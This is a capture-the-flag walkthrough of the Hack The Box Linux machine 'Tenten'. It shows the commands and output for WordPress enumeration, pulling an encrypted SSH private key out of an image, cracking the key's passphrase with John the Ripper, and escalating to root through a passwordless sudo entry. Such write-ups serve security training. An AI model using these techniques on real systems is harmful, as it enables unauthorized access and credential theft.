Tenten is a medium linux box released back in March 2017.
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
λ nihilist [ 10.10.14.20/23 ] [~]
→ nmap -F 10.10.10.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 15:20 GMT
Nmap scan report for 10.10.10.10
Host is up (0.100s latency).
Not shown: 98 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 3.36 seconds
λ nihilist [ 10.10.14.20/23 ] [~]
→ nmap -sCV -p22,80 10.10.10.10
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 15:21 GMT
Nmap scan report for 10.10.10.10
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
| 256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_ 256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.70 seconds
Our nmap scan picked up wordpress running on port 80 : let's run WPScan to enumerate it further :
λ nihilist [ 10.10.14.20/23 ] [~]
→ wpscan --url http://10.10.10.10/ -e
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.7.8
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.10.10/
[+] Started: Fri Feb 21 15:25:37 2020
Interesting Finding(s):
[+] http://10.10.10.10/
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://10.10.10.10/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://10.10.10.10/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://10.10.10.10/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.10.10/index.php/feed/, https://wordpress.org/?v=4.7.3
| - http://10.10.10.10/index.php/comments/feed/, https://wordpress.org/?v=4.7.3
[+] WordPress theme in use: twentyseventeen
| Location: http://10.10.10.10/wp-content/themes/twentyseventeen/
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://10.10.10.10/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.2
| Style URL: http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3, Match: 'Version: 1.1'
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:07 <======================================> (324 / 324) 100.00% Time: 00:00:07
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] No themes Found.
[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:55 <====================================> (2575 / 2575) 100.00% Time: 00:00:55
[i] No Timthumbs Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=========================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports - Time: 00:00:00 <=============================================> (36 / 36) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:02 <==================================> (100 / 100) 100.00% Time: 00:00:02
[i] No Medias Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <========================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] takis
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Fri Feb 21 15:26:54 2020
[+] Requests Done: 3082
[+] Cached Requests: 40
[+] Data Sent: 762.012 KB
[+] Data Received: 707.953 KB
[+] Memory used: 209.004 MB
[+] Elapsed time: 00:01:17
Looking at the results , we see that our scan picked up the usernames : takis and user1, let's head over to the website, clicking on the "jobs listing tab"
Here we see that we are looking at what seems to be the page indexed 8, so let's see if we can list every page to see if we can find any irregularities
λ nihilist [ 10.10.14.20/23 ] [~]
→ for i in $(seq 1 15); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<title>'; done
1: <title>Job Application: Hello world! – Job Portal</title>
2: <title>Job Application: Sample Page – Job Portal</title>
3: <title>Job Application: Auto Draft – Job Portal</title>
4: <title>Job Application – Job Portal</title>
5: <title>Job Application: Jobs Listing – Job Portal</title>
6: <title>Job Application: Job Application – Job Portal</title>
7: <title>Job Application: Register – Job Portal</title>
8: <title>Job Application: Pen Tester – Job Portal</title>
9: <title>Job Application: – Job Portal</title>
10: <title>Job Application: Application – Job Portal</title>
11: <title>Job Application: cube – Job Portal</title>
12: <title>Job Application: Application – Job Portal</title>
13: <title>Job Application: HackerAccessGranted – Job Portal</title>
14: <title>Job Application – Job Portal</title>
15: <title>Job Application – Job Portal</title>
Looks like we have something odd at the index 13, which could indicate an outdated wordpress plugin vulnerability : CVE-2015-6668 Which details how one can access files at a certain url using the following syntax /wp-content/uploads/%year%/%month%/%filename%
λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
→ wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
--2020-02-21 15:40:29-- http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
Connecting to 10.10.10.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 262408 (256K) [image/jpeg]
Saving to: ‘HackerAccessGranted.jpg’
HackerAccessGranted.jpg 100%[===============================================>] 256.26K 418KB/s in 0.6s
2020-02-21 15:40:29 (418 KB/s) - ‘HackerAccessGranted.jpg’ saved [262408/262408]
λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
→ file HackerAccessGranted.jpg
HackerAccessGranted.jpg: JPEG image data, JFIF standard 1.01, resolution (DPCM), density 29x29, segment length 16, baseline, precision 8, 1500x1001, components 3
Looking at the results, we seem to have downloaded a jpg file , but let's assume that this is no regular image, and it probably contains some information. Using steganography tools we discover the hidden data :
λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
→ steghide extract -sf HackerAccessGranted.jpg
Enter passphrase:
wrote extracted data to "id_rsa".
λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
→ file id_rsa
id_rsa: PEM RSA private key
λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
→ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C
/HXcUBOT3JhzblH7uF9Vh7faa76XHIdr/Ch0pDnJunjdmLS/laq1kulQ3/RF/Vax
tjTzj/V5hBEcL5GcHv3esrODlS0jhML53lAprkpawfbvwbR+XxFIJuz7zLfd/vDo
1KuGrCrRRsipkyae5KiqlC137bmWK9aE/4c5X2yfVTOEeODdW0rAoTzGufWtThZf
K2ny0iTGPndD7LMdm/o5O5As+ChDYFNphV1XDgfDzHgonKMC4iES7Jk8Gz20PJsm
SdWCazF6pIEqhI4NQrnkd8kmKqzkpfWqZDz3+g6f49GYf97aM5TQgTday2oFqoXH
WPhK3Cm0tMGqLZA01+oNuwXS0H53t9FG7GqU31wj7nAGWBpfGodGwedYde4zlOBP
VbNulRMKOkErv/NCiGVRcK6k5Qtdbwforh+6bMjmKE6QvMXbesZtQ0gC9SJZ3lMT
J0IY838HQZgOsSw1jDrxuPV2DUIYFR0W3kQrDVUym0BoxOwOf/MlTxvrC2wvbHqw
AAniuEotb9oaz/Pfau3OO/DVzYkqI99VDX/YBIxd168qqZbXsM9s/aMCdVg7TJ1g
2gxElpV7U9kxil/RNdx5UASFpvFslmOn7CTZ6N44xiatQUHyV1NgpNCyjfEMzXMo
6FtWaVqbGStax1iMRC198Z0cRkX2VoTvTlhQw74rSPGPMEH+OSFksXp7Se/wCDMA
pYZASVxl6oNWQK+pAj5z4WhaBSBEr8ZVmFfykuh4lo7Tsnxa9WNoWXo6X0FSOPMk
tNpBbPPq15+M+dSZaObad9E/MnvBfaSKlvkn4epkB7n0VkO1ssLcecfxi+bWnGPm
KowyqU6iuF28w1J9BtowgnWrUgtlqubmk0wkf+l08ig7koMyT9KfZegR7oF92xE9
4IWDTxfLy75o1DH0Rrm0f77D4HvNC2qQ0dYHkApd1dk4blcb71Fi5WF1B3RruygF
2GSreByXn5g915Ya82uC3O+ST5QBeY2pT8Bk2D6Ikmt6uIlLno0Skr3v9r6JT5J7
L0UtMgdUqf+35+cA70L/wIlP0E04U0aaGpscDg059DL88dzvIhyHg4Tlfd9xWtQS
VxMzURTwEZ43jSxX94PLlwcxzLV6FfRVAKdbi6kACsgVeULiI+yAfPjIIyV0m1kv
5HV/bYJvVatGtmkNuMtuK7NOH8iE7kCDxCnPnPZa0nWoHDk4yd50RlzznkPna74r
Xbo9FdNeLNmER/7GGdQARkpd52Uur08fIJW2wyS1bdgbBgw/G+puFAR8z7ipgj4W
p9LoYqiuxaEbiD5zUzeOtKAKL/nfmzK82zbdPxMrv7TvHUSSWEUC4O9QKiB3amgf
yWMjw3otH+ZLnBmy/fS6IVQ5OnV6rVhQ7+LRKe+qlYidzfp19lIL8UidbsBfWAzB
9Xk0sH5c1NQT6spo/nQM3UNIkkn+a7zKPJmetHsO4Ob3xKLiSpw5f35SRV+rF+mO
vIUE1/YssXMO7TK6iBIXCuuOUtOpGiLxNVRIaJvbGmazLWCSyptk5fJhPLkhuK+J
YoZn9FNAuRiYFL3rw+6qol+KoqzoPJJek6WHRy8OSE+8Dz1ysTLIPB6tGKn7EWnP
-----END RSA PRIVATE KEY-----
Looks like we extracted a private key ! although it is encrypted, so we'll use sshng2john and john to crack it and somehow guess it's passphrase.
λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
→ curl -sk https://raw.githubusercontent.com/truongkma/ctf-tools/master/John/run/sshng2john.py > sshng2john.py
λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
→ python sshng2john.py id_rsa > id_rsa.encrypted
λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
→ file id_rsa.encrypted
id_rsa.encrypted: ASCII text, with very long lines
λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
→ john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt
Created directory: /home/nihilist/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
superpassword (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:09 DONE (2020-02-21 15:46) 0.1006g/s 1442Kp/s 1442Kc/s 1442KC/sa6_123..*7¡Vamos!
Session completed
and it was quick ! the password was at the beginning of rockyou.txt : superpassword , now let's use it to log into the machine :
λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
→ chmod 600 id_rsa
λ nihilist [ 10.10.14.20/23 ] [~/_HTB/TenTen]
→ ssh -i id_rsa takis@10.10.10.10
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
65 packages can be updated.
39 updates are security updates.
Last login: Fri May 5 23:05:36 2017
takis@tenten:~$ whoami
takis
takis@tenten:~$ cat /home/takis/user.txt
e5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it ! we have been able to print out the user password.
In order to privesc we check if we can execute any binary as root without passwords using sudo -l
takis@tenten:~$ cat /root/root.txt
cat: /root/root.txt: Permission denied
takis@tenten:~$ sudo -l
Matching Defaults entries for takis on tenten:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User takis may run the following commands on tenten:
(ALL : ALL) ALL
(ALL) NOPASSWD: /bin/fuckin
looks like we have a candidate named fuckin , let's see if we can execute commands as root :
takis@tenten:~$ fuckin id
uid=1000(takis) gid=1000(takis) groups=1000(takis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
takis@tenten:~$ sudo fuckin id
uid=0(root) gid=0(root) groups=0(root)
And we were right , we can execute commands as root, let's print out the root flag :
takis@tenten:~$ sudo fuckin cat /root/root.txt
f9XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it ! we have been able to print out the root flag.
Here we can see the progress graph :
Donate XMR: 8AUYjhQeG3D5aodJDtqG499N5jXXM71gYKD8LgSsFB9BUV1o7muLv3DXHoydRTK4SZaaUBq4EAUqpZHLrX2VZLH71Jrd9k8
Contact: nihilist@contact.nowhere.moe (PGP)